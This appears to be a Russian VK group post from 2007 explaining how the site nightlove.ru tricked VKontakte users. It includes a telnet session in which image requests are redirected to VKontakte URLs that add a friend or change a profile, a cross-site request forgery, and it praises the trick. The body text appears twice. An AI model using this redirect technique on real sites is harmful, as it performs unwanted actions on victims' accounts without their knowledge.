Информация о группе
- VK ссылка:club358398
- Тип сообщества: открытое
- Количество подписчиков: 29
Как поломали вКонтакте =)
Описание: Все начинается с сылки на nightlоve.ru =)
Пошарившись по ней, пользователь находит странички, не несущие никакой информации, но содержащие в своем теле вызовы картинок. Картинок тоже нет на сервере, вместо них возвращаются заголовки, сообщающие о том, что картинки были перемещены по другому адресу.
Например;
root@Omega:/home/stuffer# telnet www.nightlоve.ru 80
Trying 84.204.41.42...
Connected to www.nightlоve.ru.
Escape character is '^]'.
GET /html/medved3.jpg HTTP/1.1
HOST: www.nightlоve.ru
HTTP/1.1 302 Found
Date: Fri, 21 Sep 2007 10:57:02 GMT
Server: Apache/1.3.37 (Unix)
Location: http://vkontakte.ru/friend.php?act=addFriend&fid=1322078
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
f0
302 Found
Found
The document has moved here.
Здесь сообщается о том, что картинка находится по адресу http://vkontakte.ru/friend.php?act=addFriend&fid=1322078
После получения такого ответа сервер переходит по этому адресу за указанной картинкой и выполняет выполняет команду на вконтакте. В данном случае - добавление друга
с номером 1322078. - автора этого аццкого прикола.
Другие картинки так же "не находятся" и содержат вызовы адресов с "вконтакте", соответственно, изменяющие ник и статус.
На данный момент ничем это не грозит, никакие пароли налево не отдает и вообще ничем не вредит.
Но советую вам быть чуток поосторожнее =)А афтору респект за простую и красивую идею =)
Просьба разослать приглашение друзьям, чтобы удержать их от необоснованной паники =)
Пошарившись по ней, пользователь находит странички, не несущие никакой информации, но содержащие в своем теле вызовы картинок. Картинок тоже нет на сервере, вместо них возвращаются заголовки, сообщающие о том, что картинки были перемещены по другому адресу.
Например;
root@Omega:/home/stuffer# telnet www.nightlоve.ru 80
Trying 84.204.41.42...
Connected to www.nightlоve.ru.
Escape character is '^]'.
GET /html/medved3.jpg HTTP/1.1
HOST: www.nightlоve.ru
HTTP/1.1 302 Found
Date: Fri, 21 Sep 2007 10:57:02 GMT
Server: Apache/1.3.37 (Unix)
Location: http://vkontakte.ru/friend.php?act=addFriend&fid=1322078
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
f0
302 Found
Found
The document has moved here.
Здесь сообщается о том, что картинка находится по адресу http://vkontakte.ru/friend.php?act=addFriend&fid=1322078
После получения такого ответа сервер переходит по этому адресу за указанной картинкой и выполняет выполняет команду на вконтакте. В данном случае - добавление друга
с номером 1322078. - автора этого аццкого прикола.
Другие картинки так же "не находятся" и содержат вызовы адресов с "вконтакте", соответственно, изменяющие ник и статус.
На данный момент ничем это не грозит, никакие пароли налево не отдает и вообще ничем не вредит.
Но советую вам быть чуток поосторожнее =)А афтору респект за простую и красивую идею =)
Просьба разослать приглашение друзьям, чтобы удержать их от необоснованной паники =)
